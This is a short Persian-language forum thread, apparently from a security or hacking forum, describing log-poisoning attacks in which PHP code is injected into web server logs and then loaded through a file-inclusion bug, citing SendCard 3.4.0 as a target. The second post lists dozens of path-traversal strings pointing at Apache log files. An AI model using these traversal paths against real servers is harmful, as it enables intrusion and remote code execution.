نمایش نتایج: از شماره 1 تا 2 از مجموع 2

موضوع: حملات جديد CURLF INjection

  
  1. #1


    عضو غیر فعال شناسه تصویری subzero_icecity
    تاریخ عضویت
    Jul 2006
    نوشته
    133
    سپاسگزاری شده
    16
    سپاسگزاری کرده
    30

    حملات جديد CURLF INjection

    با سلام

    اين حملات تزريق كد هاي مخرب به log فايل هاي و load آنها توسط نفوذ گر ميباشد

    اينم مقالش

    http://forums.simorgh-ev.com/download.php?id=114



    موضوعات مشابه:

  2. #2


    عضو غیر فعال شناسه تصویری subzero_icecity
    تاریخ عضویت
    Jul 2006
    نوشته
    133
    سپاسگزاری شده
    16
    سپاسگزاری کرده
    30
    نمونه عملي اين حمله براي باگي هست كه جهت نفوذ به : SendCard <= 3.4.0 نوشته شده (باگ را از milw0rm به دست آوريد .)

    نمونه اي از جاهايي كه كد مخرب(در اينجا كد php را به صورت Refererr يا GET در پرتكل HTTP تزريق ميكند ) ، در آنجا ثبت شده و هكر قصد Include كردن آن را با استفاده از يك باگ file injection دارد .


    كد: "../../../../../../../../../../var/log/httpd/access_log",
    "../../../../../../../../../../var/log/httpd/error_log",
    "../apache/logs/error.log",
    "../apache/logs/access.log",
    "../../apache/logs/error.log",
    "../../apache/logs/access.log",
    "../../../apache/logs/error.log",
    "../../../apache/logs/access.log",
    "../../../../apache/logs/error.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/error.log",
    "../../../../../apache/logs/access.log",
    "../logs/error.log",
    "../logs/access.log",
    "../../logs/error.log",
    "../../logs/access.log",
    "../../../logs/error.log",
    "../../../logs/access.log",
    "../../../../logs/error.log",
    "../../../../logs/access.log",
    "../../../../../logs/error.log",
    "../../../../../logs/access.log",
    "../../../../../../../../../../etc/httpd/logs/acces_log",
    "../../../../../../../../../../etc/httpd/logs/acces.log",
    "../../../../../../../../../../etc/httpd/logs/error_log",
    "../../../../../../../../../../etc/httpd/logs/error.log",
    "../../../../../../../../../../var/www/logs/access_log",
    "../../../../../../../../../../var/www/logs/access.log",
    "../../../../../../../../../../usr/local/apache/logs/access_log",
    "../../../../../../../../../../usr/local/apache/logs/access.log",
    "../../../../../../../../../../var/log/apache/access_log",
    "../../../../../../../../../../var/log/apache/access.log",
    "../../../../../../../../../../var/log/access_log",
    "../../../../../../../../../../var/www/logs/error_log",
    "../../../../../../../../../../var/www/logs/error.log",
    "../../../../../../../../../../usr/local/apache/logs/error_log",
    "../../../../../../../../../../usr/local/apache/logs/error.log",
    "../../../../../../../../../../var/log/apache/error_log",
    "../../../../../../../../../../var/log/apache/error.log",
    "../../../../../../../../../../var/log/access_log",
    "../../../../../../../../../../var/log/error_log




کلمات کلیدی در جستجوها:

حمله به access sql injection

File injection

http:forums.simorgh-ev.comdownload.phpid=114

نمونه عملی sql injection

برچسب برای این موضوع

مجوز های ارسال و ویرایش

  • شما نمی توانید موضوع جدید ارسال کنید
  • شما نمی توانید به پست ها پاسخ دهید
  • شما نمی توانید فایل پیوست ضمیمه کنید
  • شما نمی توانید پست های خود را ویرایش کنید
  •